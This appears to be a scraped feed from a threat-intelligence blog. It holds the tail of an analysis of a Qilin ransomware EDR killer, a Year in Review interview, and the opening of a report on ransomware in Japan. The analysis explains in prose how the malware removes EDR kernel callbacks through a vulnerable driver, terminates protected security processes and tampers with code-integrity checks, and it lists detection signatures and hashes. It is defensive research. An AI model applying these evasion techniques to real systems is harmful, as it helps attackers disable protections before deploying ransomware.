https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image52.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image52.png 1403w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 50. Deleting EDR callbacks.</span></figcaption></figure><p>The <code>unregister_callbacks</code> function iterates through a list of over 300 driver names which are stored in the sample.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image53.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1106" height="302" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image53.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image53.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image53.png 1106w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 51. EDR driver name list.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image54.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="1291" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image54.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image54.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image54.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image54.png 2162w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 52. </span><code spellcheck="false" style="white-space: pre-wrap;"><span>unregister_callbacks</span></code><span style="white-space: pre-wrap;"> function.</span></figcaption></figure><p>It also demonstrates the overall implementation of the malware, which is also used in several other functions. It uses a certain API function to calculate an offset to the function or object it is really using &#x2014; in this case, the kernel callback <code>cng!CngCreateProcessNotifyRoutine</code>. It also does not touch this object in the process virtual address space. It uses the driver loaded earlier (&#x201C;rwdrv.sys&#x201D;) to get the physical memory address of it. The logic and driver communication is implemented in the <code>read_phy_bytes</code> function, and the same for overwriting memory; the <code>write_to_phy_mem</code> function is used to handle the driver communications. The <code>DeviceIoControlImplementation</code> function which talks to the driver is implemented in <code>write_to_phy_mem</code>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image55.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1370" height="220" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image55.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image55.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image55.png 1370w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 53. </span><code spellcheck="false" style="white-space: pre-wrap;"><span>DeviceIoControlImplementation</span></code><span style="white-space: pre-wrap;"> function called in </span><code spellcheck="false" style="white-space: pre-wrap;"><span>write_to_phy_mem</span></code><span style="white-space: pre-wrap;">.</span></figcaption></figure><p>The other callback-related functions shown in Figure 44 work similarly to the one we discussed. They overwrite or unregister other EDR-specific callbacks, which were set by the EDR Mini-Filter driver.</p><p>The final part of the EDR killer begins by loading another driver (&#x201C;hlpdrv.sys&#x201D;).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image56.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1872" height="1163" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image56.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image56.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image56.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image56.png 1872w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 54. Load and use of hlpdrv.sys.</span></figcaption></figure><p>The malware uses the driver to terminate EDR processes running on the system using the IOCTL code 0x2222008. This executes the function in the driver which is responsible for unprotecting and terminating the process.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image57.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1269" height="1234" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image57.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image57.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image57.png 1269w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 55. Terminate protected process function in hlpdrv.sys.</span></figcaption></figure><p>Once terminated, EDR processes such as Windows Defender no longer run, as demonstrated in Figure 56.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image58.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="623" height="112" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image58.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image58.png 623w"><figcaption><span style="white-space: pre-wrap;">Figure 56. Terminated Windows Defender process.</span></figcaption></figure><p>Additionally, it restores the <code>CiValidateImageHeader</code> callback. The <code>RestoreCiValidateImageHeaderCallback</code> function is shown in Figure 57.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image59.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1899" height="1478" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image59.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image59.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image59.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image59.png 1899w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 57. Restoring code integrity checks.</span></figcaption></figure><p>This is accomplished using the same concept we previously saw in Figure 52:</p><ul><li>Resolve a known API function.</li><li>Use this function as an anchor point to locate a specific instruction within its code.</li><li>This instruction contains a pointer in one of its operands that points to, or near, the object of interest.</li><li>Identify the pointer to the target object within that instruction.</li><li>Perform a sign extension on the operand.</li><li>Add an additional offset to compute the final address of the object being sought &#x2014; in this case, the <code>CiValidateImageHeader</code> callback.</li><li>Restore the original function pointer to <code>CiValidateImageHeader</code>.</li></ul><p>Note that the malware had previously overwritten the callback to <code>CiValidateImageHeader</code> with the address of <code>ArbPreprocessEntry</code>, a function that always returns true. In other words, it has now restored the original Code Integrity check.</p><h2 id="summary">Summary</h2><p>This blog was a technical deep dive into the infection chain that is hidden in the malicious &#x201C;msimg32.dll&#x201D;, which has been observed during Qilin ransomware attacks. It demonstrates the sophisticated tricks the malware is employing to circumvent or completely disable modern EDR protection features on compromised systems.</p><p>It is encouraging to see how many hurdles modern malware must overcome. At the same time, this highlights that even state-of-the-art defense mechanisms can still be bypassed by determined adversaries. Defenders should never rely on a single product for protection; instead, Talos strongly recommends a multi-layered security approach. This significantly increases the difficulty for attackers to remain undetected, even if they manage to evade one line of defense.</p><h2 id="coverage">Coverage</h2><p>The following ClamAV signatures detect and block this threat:</p><ul><li>Win.Malware.Bumblebee-10056548-0</li><li>Win.Tool.EdrKiller-10059833-0</li><li>Win.Tool.ThrottleStop-10059849-0</li></ul><p>The following SNORT&#xAE; rules (SIDs) detect and block this threat:&#xA0;</p><ul><li>Covering Snort2 SID(s): 1:66181, 1:66180</li><li>Covering Snort3 SID(s): 1:301456</li></ul><h2 id="indicators-of-compromise-iocs">Indicators of compromise (IOCs)</h2><p>The IOCs for this threat are also available at our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/blob/main/2026/04/overview-of-ransomware-threats-in-japan.txt" rel="noreferrer">here</a>.</p><p>msimg32.dll<br>MD5: 89ee7235906f7d12737679860264feaf<br>SHA1: 01d00d3dd8bc8fd92dae9e04d0f076cb3158dc9c<br>SHA256: 7787da25451f5538766240f4a8a2846d0a589c59391e15f188aa077e8b888497</p><p>rwdrv.sys <br>MD5: 6bc8e3505d9f51368ddf323acb6abc49<br>SHA1: 82ed942a52cdcf120a8919730e00ba37619661a3<br>SHA256: 16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0</p><p>hlpdrv.sys <br>cf7cad39407d8cd93135be42b6bd258f<br>ce1b9909cef820e5281618a7a0099a27a70643dc<br>bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56<br><br>EDRKiller.exe (non-fixed memory dump with overlay)<br>MD5: 1305e8b0f9c459d5ed85e7e474fbebb1<br>SHA1: 84e2d2084fe08262c2c378a377963a1482b35ac5<br>SHA256: 12fcde06ddadf1b48a61b12596e6286316fd33e850687fe4153dfd9383f0a4a0<br>Time stamp: 0x684d33f0 (14. June 2025, 08:33:52 UTC)<br>ImpHash : 05aa031a007e2f51e3f48ae2ed1e1fcb<br>TLSH: T1B4647C01B7E50CF9EE77C638C9614A06EA72BC425761DADF43A04A964F237D09E3DB12</p>]]></content:encoded></item><item><title><![CDATA[Inside the Talos 2025 Year in Review: A discussion on what the data means for defenders]]></title><description><![CDATA[A conversation between Cisco Talos and Cisco Security leaders on the 2025 threat landscape, from identity attacks and legacy vulnerabilities to AI-driven threats, and what defenders should prioritize now.]]></description><link>https://blog.talosintelligence.com/inside-the-talos-2025-year-in-review-a-discussion-on-what-the-data-means-for-defenders/</link><guid isPermaLink="false">69c2ba2d8f3b4700016ef34e</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Thu, 02 Apr 2026 10:00:49 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-1.jpg" alt="Inside the Talos 2025 Year in Review: A discussion on what the data means for defenders"><p>Every&#xA0;year, the&#xA0;<a href="https://www.blog.talosintelligence.com/2025yearinreview" rel="noreferrer noopener"><u>Cisco</u>&#xA0;<u>Talos Year in Review</u></a>&#xA0;captures the patterns shaping the threat landscape.&#xA0;The 2025 report paints a clear picture:&#xA0;Attackers are moving&#xA0;faster than ever, while&#xA0;using&#xA0;identity-related attacks&#xA0;as the primary battleground.&#xA0;&#xA0;</p><p>To unpack the biggest takeaways and what they mean for security teams, we brought together Christopher Marshall, VP of Cisco Talos, and Peter Bailey, SVP and GM of Cisco Security.&#xA0;</p><p>Here&#x2019;s&#xA0;their conversation.&#xA0;</p><h2 id="old-vulnerabilities-new-speed">Old&#xA0;vulnerabilities,&#xA0;new&#xA0;speed&#xA0;</h2><p><strong>Marshall:</strong>&#x2028;&#xA0;One of the clearest&#xA0;trends&#xA0;in this year&#x2019;s data is the contrast in how vulnerabilities are being exploited. We saw React2Shell disclosed in December and within weeks it became the most targeted vulnerability we tracked.&#xA0;</p><p>At the same time, a 12-year-old vulnerability still appeared in the top 10 most exploited list.&#xA0;So&#xA0;we&#x2019;re&#xA0;seeing very rapid weaponization (likely fuelled by AI given the compressed timeline from initial proof of concept to large-scale exploitation, across multiple languages and platforms) alongside continued success with legacy flaws.&#xA0;&#xA0;</p><p><strong>Bailey:</strong>&#x2028;&#xA0;There&#x2019;s&#xA0;always&#xA0;a lot of&#xA0;focus on the latest zero-day, and rightly so. The industrialization of vulnerability exploitation is extremely concerning. But at the same time,&#xA0;many&#xA0;attacks are still&#xA0;leveraging&#xA0;vulnerabilities&#xA0;that have been around for years.</p><p>Organizations are dealing with complexity. Large environments. Long device lifecycles. Change management processes that take time. But attackers&#xA0;don&#x2019;t&#xA0;care about those constraints.&#xA0;They&#xA0;actually count&#xA0;on them.&#xA0;</p><p>This is where we need to repeat that the fundamentals still matter. Patch management, asset visibility, lifecycle discipline...&#xA0;We still have work to do there as an industry.&#xA0;&#xA0;</p><p><strong>Marshall:</strong>&#x2028;&#xA0;And then you have&#xA0;40%&#xA0;of the top 100 exploited vulnerabilities being effective because organizations were running end-of-life devices.&#xA0;That&#x2019;s&#xA0;a measurable problem. When infrastructure is no longer supported, attackers know it. They scan for it,&#xA0;and&#xA0;then they target&#xA0;it. Technical debt becomes operational risk.&#xA0;&#xA0;</p><p><strong>Bailey:</strong>&#x2028;&#xA0;Absolutely.&#xA0;In&#xA0;most cases,&#xA0;it&#x2019;s&#xA0;not that customers&#xA0;don&#x2019;t&#xA0;want to patch.&#xA0;It&#x2019;s&#xA0;that their&#xA0;critical networking infrastructure has been stable for&#xA0;years, and&#xA0;taking it offline can disrupt the business.&#xA0;</p><p>As an industry,&#xA0;we&#xA0;need&#xA0;to reduce that friction.&#xA0;Cisco is a big part of that, with built-in&#xA0;protections&#xA0;in our networking equipment&#xA0;that can be applied without downtime,&#xA0;and&#xA0;options&#xA0;to shield systems when patching&#xA0;can&apos;thappen&#xA0;immediately.&#xA0;&#xA0;</p><h2 id="identity-as-the-primary-target">Identity as the&#xA0;primary&#xA0;target&#xA0;</h2><p><strong>Marshall:</strong>&#x2028;&#xA0;If&#xA0;there&#x2019;s&#xA0;one area where attackers are consistently investing&#xA0;their time and energy,&#xA0;it&#x2019;s&#xA0;identity.&#xA0;In 2025, identity-based&#xA0;attack&#xA0;techniques were central to major phases of operations, like&#xA0;lateral movement, privilege escalation, and persistence. Controlling identity effectively means controlling access across the environment.&#xA0;&#xA0;</p><p>One of the most striking data points in the report is that fraudulent device registration increased 178 percent year over year. In many cases, attackers convinced administrators to register devices on their behalf through vishing&#xA0;(or&#xA0;voice phishing).&#xA0;They targeted administrator-managed registration flows at three times the rate of user-driven ones.&#xA0;There&#x2019;s&#xA0;a clear preference for high-value victims.&#xA0;</p><p><strong>Bailey:</strong>&#x2028;&#xA0;And&#xA0;unfortunately&#xA0;these&#xA0;stolen credentials are widely available. Logging in is often easier than breaking in. Once attackers obtain legitimate access, they can blend in.&#xA0;&#xA0;</p><p>For defenders, identity controls&#xA0;need&#xA0;to go beyond authentication. You need continuous monitoring. You need risk-based adjustments to access. You need to detect abnormal&#xA0;behavior&#xA0;quickly.&#xA0;</p><p><strong>Marshall:</strong>&#x2028;&#xA0;We&#x2019;re&#xA0;also seeing a rise in internal phishing. More than a third of phishing incidents we&#xA0;observed&#xA0;involved attackers sending messages from already compromised accounts.&#xA0;</p><p>Once inside, they create mailbox rules to hide replies and suppress visibility. They explore shared drives and collaboration platforms. They look for sensitive information that can help them expand access. This all&#xA0;means defenders need strong visibility into normal user&#xA0;behavior. If accounts suddenly start sending far more messages than usual or accessing data they never touched before, that should stand out.&#xA0;</p><p><strong>Bailey:</strong>&#xA0;&#x2028;Identity is no longer just an authentication problem.&#xA0;It&#x2019;s&#xA0;a monitoring and governance problem,&#xA0;as well.&#xA0;&#xA0;</p><h2 id="state-sponsored-activity-and-the-blurring-of-motives">State-sponsored&#xA0;activity and the&#xA0;blurring of&#xA0;motives&#xA0;</h2><p><strong>Marshall:</strong>&#x2028;&#xA0;We&#xA0;observed&#xA0;continued evolution in state-sponsored activity&#xA0;throughout the year.&#xA0;Talos investigations into China-nexus campaigns increased&#xA0;nearly 75 percent&#xA0;in 2025. These actors are exploiting both zero-day and&#xA0;n-day&#xA0;vulnerabilities while also engaging in financially motivated activity to support&#xA0;their&#xA0;broader&#xA0;goals.&#xA0;</p><p>Russian-linked activity continues to correlate closely with geopolitical developments. We consistently see&#xA0;these actors&#xA0;exploiting&#xA0;unpatched networking equipment to&#xA0;establish&#xA0;long-term access.&#xA0;</p><p>North Korean&#xA0;affiliated&#xA0;actors refined their &#x201C;Contagious Interview&#x201D; campaigns. They&#xA0;compromised&#xA0;developers through fake job opportunities and expanded&#xA0;IT worker schemes using AI-generated personas.&#xA0;</p><p>Iranian-linked actors increased hacktivist-style operations by&#xA0;roughly 60 percent&#xA0;last year, and&#xA0;we&#x2019;ve&#xA0;seen that&#xA0;type of activity rise&#xA0;again during the ongoing conflict in the Middle&#xA0;East.&#x202F;At the same time,&#xA0;actors such as&#x202F;ShroudedSnooper&#x202F;are deploying highly evasive&#xA0;and&#xA0;stealthy backdoors to&#x202F;maintain&#x202F;long-term access to critical telecommunications infrastructure.&#xA0;</p><p><strong>Bailey:</strong>&#x2028;&#xA0;These groups are adaptive and pragmatic.&#xA0;From a defender&#x2019;s perspective, the distinction between state-sponsored and criminal actors is less useful than&#xA0;it&#xA0;used to be. Techniques overlap, tools are shared, and infrastructure gets reused.&#xA0;&#xA0;</p><p>What matters is&#xA0;speed.&#xA0;These actors move quickly and often target the edge of the network&#xA0;through&#xA0;unpatched devices&#xA0;and legacy infrastructure.&#xA0;&#xA0;&#xA0;</p><p>That&#x2019;s&#xA0;where&#xA0;intelligence becomes critical.&#xA0;At Cisco,&#xA0;when Talos&#xA0;identifies&#xA0;a campaign or toolset, that intelligence feeds directly into protections&#xA0;for customers. Speed of detection and response&#xA0;must&#xA0;match the pace of the threat.&#xA0;&#xA0;</p><h2 id="ai-and-the-acceleration-of-attacks">AI and the&#xA0;acceleration of&#xA0;attacks&#xA0;</h2><p><strong>Marshall:</strong>&#x2028;&#xA0;In 2025, AI was&#xA0;most commonly used&#xA0;to automate&#xA0;and scale&#xA0;parts of traditional attacks,&#xA0;especially&#xA0;social engineering. It lowered the barrier to creating convincing phishing lures and fraudulent sites.&#xA0;</p><p>The Year in Review is based on trends throughout 2025,&#xA0;but&#xA0;we&#xA0;also&#xA0;want to call attention to&#xA0;the fact that the&#xA0;AI threat landscape is changing&#xA0;fast, even in the first few months of 2026.&#xA0;Research into threats like&#xA0;VoidLinkshows how AI can accelerate malware development. The tasks that previously&#xA0;required&#xA0;extended development cycles are now being&#xA0;completed quicker than ever.&#xA0;&#xA0;&#xA0;</p><p>We&#x2019;re&#xA0;also seeing early examples of AI-enabled malware in mobile environments. Agentic capabilities can&#xA0;analyze&#xA0;screen content and&#xA0;determine&#xA0;next actions.&#xA0;It&#x2019;s&#xA0;still early, but the pace of change is notable.&#xA0;</p><p><strong>Bailey:</strong>&#x2028;&#xA0;Organizations also need to think about how they deploy AI internally.&#xA0;</p><p>We saw rapid adoption of consumer AI tools, followed by a realization that guardrails were necessary. Prompt injection, data exposure, unauthorized model access... These are real concerns.&#xA0;&#xA0;</p><p>Now&#xA0;we&#x2019;re&#xA0;seeing companies implement controls such as semantic inspection of prompts, model scanning, and discovery of shadow AI deployments.&#xA0;Secure AI deployment will quickly become standard practice. It&#xA0;has to.&#xA0;</p><h2 id="using-the-report-as-a-prioritization-tool">Using the&#xA0;report as a&#xA0;prioritization&#xA0;tool&#xA0;</h2><p><strong>Marshall:</strong>&#x2028;&#xA0;We designed the&#xA0;Talos&#xA0;Year in Review to help defenders prioritize.&#xA0;And in terms of those priorities,&#xA0;I&#x2019;d&#xA0;like to leave people with a few that stand out.&#xA0;</p><p>The data shows that attackers consistently pursue&#xA0;access for&#xA0;scale and&#xA0;leverage.&#xA0;They want the keys to the kingdom, so they target identity systems, administrators, and end-of-life infrastructure because it gives them broad access.&#xA0;</p><p>Strengthening&#xA0;your&#xA0;identity&#xA0;controls,&#xA0;understanding your environment,&#xA0;and&#xA0;safeguarding&#xA0;and&#xA0;removing&#xA0;EOL&#xA0;infrastructure&#xA0;are three of&#xA0;the most important&#xA0;actions organizations can take.&#xA0;</p><p><strong>Bailey:</strong>&#x2028;&#xA0;I agree.&#xA0;Patching is still&#xA0;crucial,&#xA0;but&#xA0;just as important is&#xA0;ensuring&#xA0;you have&#xA0;visibility across devices, strong segmentation, and continuous monitoring for abnormal&#xA0;behavior.&#xA0;</p><p>We&#x2019;re&#xA0;also seeing&#xA0;attacks&#xA0;happening&#xA0;faster,&#xA0;increasingly&#xA0;amplified by automation and AI.&#xA0;&#xA0;Agentic AI is opening the door to a&#xA0;catalogue&#xA0;of features that will automate manual work and allow adversaries to&#xA0;greatly expandtheir capabilities.&#xA0;Now more than ever,&#xA0;defenders need architectures that are resilient and observable&#xA0;in the face of these developments.&#xA0;&#xA0;</p><p>I encourage everyone to read&#xA0;<a href="https://cisco.sharepoint.com/sites/StrategicPlanningandCommunications/Shared%20Documents/Year%20in%20Review%20(YiR)/2025%20Year%20in%20Review/Blog%20drafts/While%20the%20Year%20in%20Review%20is%20based%20on%20trends%20throughout%202025,%20one%20area%20we%20want%20to%20call%20attention%20to%20is%20just%20how%20fast%20the%20AI%20threat%20landscape%20is%20changing,%20even%20in%20the%20first%20few%20months%20of%202026." rel="noreferrer noopener"><u>the full</u>&#xA0;<u>Talos</u>&#xA0;<u>report</u></a>.&#xA0;It&#x2019;s&#xA0;filled&#xA0;with data and practical guidance.&#xA0;&#xA0;&#xA0;</p><p><strong>Marshall:</strong>&#x2028;&#xA0;&#xA0;</p><p>Thank you, Peter. This report&#xA0;represents&#xA0;a tremendous amount of effort across&#xA0;Talos&#xA0;and&#xA0;it&apos;s&#xA0;built with our customers in mind.&#xA0;I&apos;d&#xA0;like to extend a sincere appreciation to my team and&#xA0;all of&#xA0;our partners who contributed to its life and launch.&#xA0;&#xA0;</p><p>Our goal with the Year in Review, much like our general mission at Talos, is simple: Show where adversaries are succeeding, and&#xA0;provide&#xA0;clear guidance on how to reduce that success rate.&#xA0;&#xA0;</p><p>In addition, I would ask&#xA0;all of&#xA0;our customers to use this report to challenge us, challenge Cisco. We strive to give you the greatest protection, products, and services possible. Let us know how we can be better.&#xA0;</p><div class="kg-card kg-header-card kg-v2 kg-width-regular " data-background-color="#000000">
            
            <picture><img class="kg-header-card-image" src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/YiR2025_background-2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/YiR2025_background-2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/YiR2025_background-2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg 2000w" loading="lazy" alt="Inside the Talos 2025 Year in Review: A discussion on what the data means for defenders"></picture>
        
            <div class="kg-header-card-content">
                
                <div class="kg-header-card-text kg-align-center">
                    <h2 id="read-the-2025-cisco-talos-year-in-review" class="kg-header-card-heading" style="color: #FFFFFF;" data-text-color="#FFFFFF"><span style="white-space: pre-wrap;">Read the 2025 Cisco Talos Year in Review</span></h2>
                    
                    <a href="https://blog.talosintelligence.com/content/files/2026/03/2025YiR-report.pdf" class="kg-header-card-button kg-style-accent" style="color: #FFFFFF;" data-button-color="accent" data-button-text-color="#FFFFFF">Download now</a>
                </div>
            </div>
        </div>]]></content:encoded></item><item><title><![CDATA[An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases]]></title><description><![CDATA[There were 134 ransomware incidents reported in Japan in 2025, representing a 17.5% year-over-year increase from 2024.]]></description><link>https://blog.talosintelligence.com/an-overview-of-ransomware-threats-in-japan-in-2025-and-early-detection-insights-from-qilin-cases/</link><guid isPermaLink="false">69ca81189610580001d2fcaa</guid><category><![CDATA[ransomware]]></category><dc:creator><![CDATA[Azim Khodjibaev]]></dc:creator><pubDate>Thu, 02 Apr 2026 10:00:13 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/qillin-1-.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>In 2025, a total of 134 ransomware incidents were reported in Japan, marking a 17.5% increase compared to 2024. Among these, 22 incidents were attributed to Qilin, representing 16.4% of the total.</li><li>In 2025, Qilin ransomware was highly active. Looking ahead to 2026, unless there is significant external pressure or disruption, it is likely to further increase its impact. While there are some variations in tactics across affiliates, operations are expected to become more automated, with fewer trial-and-error steps and increasingly refined tradecraft.</li><li>Evidence suggests that some Qilin affiliates may have ties to countries in the post-Soviet region, including the Baltic states.</li><li>Rather than focusing on post-ransomware execution, this blog examines detection opportunities during the pre-ransomware phase.</li></ul><hr><h2 id="ransomware-activity-in-japan-in-2025">Ransomware activity in Japan in 2025</h2><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/qillin-1-.jpg" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases"><p>In 2025, the number of ransomware incidents increased compared to 2024. Notably, it was a year in which attacks leveraging Qilin ransomware were observed most frequently. There were 134 ransomware incidents reported in Japan in 2025, representing a 17.5% year-over-year increase from 2024. Figure 1 presents the monthly number of ransomware incidents. The data was compiled based on information obtained from data leak sites, official disclosures by affected organizations, and publicly available media reports. On average, approximately 11 incidents were observed per month.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/japan-victim-counts.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="1261" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/japan-victim-counts.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/japan-victim-counts.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/japan-victim-counts.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/japan-victim-counts.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 1. Monthly victim counts in 2025.</span></figcaption></figure><p>Industry-based analysis, as shown in Figure 2, indicates that manufacturing accounts for the largest share of affected organizations (28%). This is followed by automotive-related industries (8%), trading companies (7%), IT (6%), and education (5%). The data suggests that manufacturing and automotive-related sectors continue to be heavily targeted, consistent with last year.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/japan-number.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="1206" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/japan-number.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/japan-number.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/japan-number.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/japan-number.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 2. Number of victim organizations by industry.</span></figcaption></figure><p>Small- and medium-sized enterprises (based on capital) remained the primary targets of ransomware attacks at 57% of victim organizations, compared to 17% for large enterprises (see Figure 3).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/japan-classification.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="1219" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/japan-classification.jpg 600w, 